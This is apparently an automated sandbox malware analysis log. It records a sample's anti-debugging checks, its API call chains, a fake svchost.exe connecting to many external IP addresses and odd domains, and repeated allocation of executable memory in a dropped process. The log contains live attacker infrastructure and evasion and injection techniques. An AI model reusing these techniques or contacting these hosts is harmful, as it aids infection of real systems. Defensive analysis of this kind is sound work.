Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00401B20 rdtsc 1_2_00401B20
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,22_2_012F79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,22_2_012F78A0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,1_2_004020E0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00406800 mov eax, dword ptr fs:[00000030h]1_2_00406800
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00406B60 mov eax, dword ptr fs:[00000030h]1_2_00406B60
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00406B60 mov edx, dword ptr fs:[00000030h]1_2_00406B60
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01281360 mov eax, dword ptr fs:[00000030h]22_2_01281360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01281360 mov edx, dword ptr fs:[00000030h]22_2_01281360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01281000 mov eax, dword ptr fs:[00000030h]22_2_01281000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01531360 mov eax, dword ptr fs:[00000030h]25_2_01531360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01531360 mov edx, dword ptr fs:[00000030h]25_2_01531360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01531000 mov eax, dword ptr fs:[00000030h]25_2_01531000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A41360 mov eax, dword ptr fs:[00000030h]27_2_00A41360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A41360 mov edx, dword ptr fs:[00000030h]27_2_00A41360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A41000 mov eax, dword ptr fs:[00000030h]27_2_00A41000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01201360 mov eax, dword ptr fs:[00000030h]29_2_01201360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01201360 mov edx, dword ptr fs:[00000030h]29_2_01201360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01201000 mov eax, dword ptr fs:[00000030h]29_2_01201000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B1360 mov eax, dword ptr fs:[00000030h]31_2_010B1360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B1360 mov edx, dword ptr fs:[00000030h]31_2_010B1360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B1000 mov eax, dword ptr fs:[00000030h]31_2_010B1000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01291360 mov eax, dword ptr fs:[00000030h]33_2_01291360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01291360 mov edx, dword ptr fs:[00000030h]33_2_01291360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01291000 mov eax, dword ptr fs:[00000030h]33_2_01291000
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr,1_2_00401150

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 178.162.203.202 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 99.83.170.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vocypyt.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: pujycyp.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1000000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1280000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1530000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A40000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1200000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1290000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 590000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1630000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1040000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CC0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1110000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1220000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B30000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1090000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1260000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1190000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1500000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F40000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A20000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 16D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1060000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1450000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1160000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 13A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 860000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1060000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1250000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1270000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 11B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 800000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 860000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 790000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 15A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1250000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EC0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1020000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1340000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D00000 protect: page execute and read and writeJump to behavior
